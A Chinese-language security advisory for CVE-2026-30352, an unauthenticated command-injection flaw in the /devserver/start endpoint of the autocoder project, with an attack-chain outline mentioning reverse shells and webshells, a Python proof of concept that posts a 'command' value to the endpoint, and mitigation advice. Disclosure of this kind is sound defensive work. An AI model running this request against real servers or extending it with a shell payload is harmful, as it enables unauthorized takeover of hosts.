CVE-2026-30352 CVSS 9.8 严重

CVE-2026-30352: leonvanzyl autocoder 远程代码执行漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30352

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

leonvanzyl autocoder

漏洞概述

leonvanzyl autocoder项目的/devserver/start端点存在严重的远程代码执行漏洞。由于对用户输入的command参数缺乏有效过滤，未经身份验证的攻击者可通过发送特制请求在服务器上执行任意系统命令，完全控制受影响主机。

技术细节

该漏洞位于 leonvanzyl autocoder 的 `/devserver/start` API 端点。在 commit 79d02a 版本中，应用程序直接接收用户提供的 `command` 参数，并将其传递给后端的命令执行函数，未进行任何安全校验或转义。这使得攻击者能够利用操作系统命令注入技术，通过精心构造的 payload（如拼接 Shell 元字符）注入并执行任意恶意指令。由于漏洞利用无需用户交互且无需身份认证，攻击者可远程发起攻击，导致服务器被完全接管，数据泄露及服务中断。

攻击链分析

STEP 1

侦察

攻击者扫描目标网络，识别出运行 leonvanzyl autocoder 服务的服务器，并确定 /devserver/start 接口可访问。

STEP 2

武器化

攻击者构造包含恶意系统命令（如反弹Shell或写入WebShell）的 payload，并将其赋值给 command 参数。

STEP 3

交付

攻击者向目标服务器的 /devserver/start 端点发送 HTTP POST 请求，携带恶意参数。

STEP 4

利用

服务器端应用程序接收请求，直接将 command 参数传递给系统执行层，导致恶意代码在服务器上运行。

STEP 5

行动

攻击者获得服务器权限，执行进一步操作，如窃取数据、安装后门或横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    """
    PoC for CVE-2026-30352 RCE in leonvanzyl autocoder
    """
    # Vulnerable endpoint
    endpoint = f"{target_url}/devserver/start"
    
    # Malicious payload to execute 'id' command
    # Adjust the parameter name 'command' based on actual request structure
    payload_data = {
        "command": "id"
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, data=payload_data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response:")
            print(response.text)
            
            # Check for common command output indicators
            if "uid=" in response.text or "gid=" in response.text:
                print("[!] Potential RCE confirmed via 'id' command output.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:3000" # Replace with actual target
    exploit(target)

影响范围

leonvanzyl autocoder commit 79d02a

防御指南

临时缓解措施

建议立即在网络边界阻断对该应用 /devserver/start 路径的访问，或者暂停该服务直至应用官方补丁。如果无法立即修补，应确保应用运行在隔离的容器环境中，以限制命令执行后的横向移动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-30352
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-30352
3 Details https://www.cvedetails.com/cve/CVE-2026-30352/
4 VulDB https://vuldb.com/cve/CVE-2026-30352
5 Link http://autocoder.com
6 Link http://leonvanzyl.com
7 Link https://gist.github.com/syphonetic/e3bdee6c022b36d5ecb98fbf61284931
8 Link https://github.com/leonvanzyl/autocoder

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表